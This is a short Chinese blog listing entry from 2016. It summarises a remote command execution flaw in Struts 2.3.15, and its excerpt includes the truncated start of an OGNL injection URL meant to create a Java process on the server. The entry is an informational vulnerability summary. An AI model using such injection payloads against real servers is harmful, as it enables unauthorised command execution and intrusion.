2016年4月27日
Strtuts2.3.15 bug ,可以远程执行命令
摘要: 在2013年6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞[1] ,主要问题如下: 可远程执行服务器脚本代码[2] 用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.Process 阅读全文
posted @ 2016-04-27 21:39 天上谪仙人 阅读(160) 评论(0) 推荐(0) 编辑